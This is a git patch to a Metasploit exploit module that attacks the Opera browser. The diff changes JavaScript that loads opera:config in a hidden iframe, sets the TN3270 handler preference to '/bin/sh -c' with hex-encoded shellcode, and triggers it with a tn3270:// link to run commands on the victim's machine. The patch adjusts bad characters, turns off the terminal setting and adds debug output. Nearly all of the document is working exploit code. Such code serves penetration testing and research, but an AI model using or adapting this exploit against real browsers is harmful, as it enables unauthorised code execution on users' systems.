From 8e0eef03c6ebac4f8ea838d7e051b2687b8f0c6d Mon Sep 17 00:00:00 2001
From: James Lee <James_Lee@rapid7.com>
Date: Thu, 3 Dec 2009 09:09:56 +0000
Subject: [PATCH] see #594. remove some extraneous junk, don't run the shell in
 a terminal (it dies immediately). space is the only badchar.  still doesn't
 actually work without a modification to encoder/cmd/generic_sh.

git-svn-id: file:///home/svn/framework3/trunk@7680 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../multi/browser/opera_configoverwrite.rb    | 67 ++++++++-----------
 1 file changed, 29 insertions(+), 38 deletions(-)

diff --git a/modules/exploits/multi/browser/opera_configoverwrite.rb b/modules/exploits/multi/browser/opera_configoverwrite.rb
index e3a4d502b7..7a3de6c292 100644
--- a/modules/exploits/multi/browser/opera_configoverwrite.rb
+++ b/modules/exploits/multi/browser/opera_configoverwrite.rb
@@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'ExitFunc' => 'process',
 					'Space'    => 2048,
 					'DisableNops' => true,
-					'BadChars' => " |'<>&",
+					'BadChars' => " ",
 				},
 			'Targets'        =>
 				[
@@ -71,27 +71,15 @@ class Metasploit3 < Msf::Exploit::Remote
 			# Not sure when this was disclosed but it's been known since at
 			# least March 5, 2007, since that's the release date on the version
 			# of mpack I stole this from.
-			'DisclosureDate' => 'Mar 5 2007'
+			'DisclosureDate' => 'Mar 5 2007',
+			'DefaultTarget' => 0
 			}))
 	end
 
 	def on_request_uri(cli, request)
+		print_status("Got request #{request.uri}")
 
 		case request.uri
-		when /payload$/
-			print_status("Generating payload for #{target} #{target.platform}")
-			# Re-generate the payload
-			if ((p = regenerate_payload(cli)) == nil)
-				print_error("Payload generation failed, 404ing request for #{request.uri}")
-				send_not_found(cli)
-				return
-			end
-			# NOTE: Change this to the new API when commiting to trunk
-			#content = Msf::Util::EXE.to_win32pe(p.encoded)
-			#content = Rex::Text.to_win32pe(p.encoded)
-			content = "foo"
-			print_status("Generated #{content.length} bytes")
-			headers = { 'Content-Type' => 'application/octet-stream' }
 		when get_resource
 			print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
 			content =  "<body><script>"
@@ -105,13 +93,17 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 		send_response_html(cli, content, headers)
 
+		print_status("Done with request #{request.uri}")
 	end
 
 	def generate_evil_js(cli, request)
 		# There are a bunch of levels of quotes here, so the easiest way to
 		# make everything line up is to hex escape the command to run
 		p = regenerate_payload(cli).encoded
-		#print_status(p)
+		$stdout.puts(p.class)
+		print_status(p)
+		send_not_found(cli) && return if not p
+		
 		shellcode = Rex::Text.to_hex(p, "%")
 		js = <<ENDJS
 blank_iframe = document.createElement('iframe');
@@ -121,33 +113,32 @@ blank_iframe.setAttribute('style', 'display:none');
 document.body.appendChild(blank_iframe);
 blank_iframe_window.eval(
 	"config_iframe = document.createElement('iframe');" +
-    "config_iframe.setAttribute('id', 'config_iframe_window');" +
-    "config_iframe.src = 'opera:config';" +
-    "document.body.appendChild(config_iframe);" +
-    "cache_iframe = document.createElement('iframe');" +
-    "cache_iframe.src = 'opera:cache';" +
-    "cache_iframe.onload = function ()" +
-    "{" +
-    "	config_iframe_window.eval" +
-    "	(\\"" +
+	"config_iframe.setAttribute('id', 'config_iframe_window');" +
+	"config_iframe.src = 'opera:config';" +
+	"document.body.appendChild(config_iframe);" +
+	"cache_iframe = document.createElement('iframe');" +
+	"cache_iframe.src = 'opera:cache';" +
+	"cache_iframe.onload = function ()" +
+	"{" +
+	"	config_iframe_window.eval" +
+	"	(\\"" +
 	"	old_handler = opera.getPreference('Network','TN3270 App');" +
+	"	old_pref    = opera.getPreference('User Prefs','Run TN3270 In Terminal');" +
 	"	shellcode = '#{shellcode}';" +
-    "	opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
-    "	app_link = document.createElement('a');" +
-    "	app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +
-    "	app_link.click();" +
-    "	setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
-    "	\\");" +
-    "};" +
-    "document.body.appendChild(cache_iframe);" +
+	"	opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
+	"	opera.setPreference('User Prefs','Run TN3270 In Terminal','0');" +
+	"	app_link = document.createElement('a');" +
+	"	app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +
+	"	app_link.click();" +
+	"	setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
+	"	setTimeout(function () {opera.setPreference('User Prefs','Run TN3270 In Terminal',old_pref)},1000);" +
+	"	\\");" +
+	"};" +
+	"document.body.appendChild(cache_iframe);" +
 "");
 ENDJS
 
 	end
 
-	def generate_evil_preference()
-
-	end
-
 end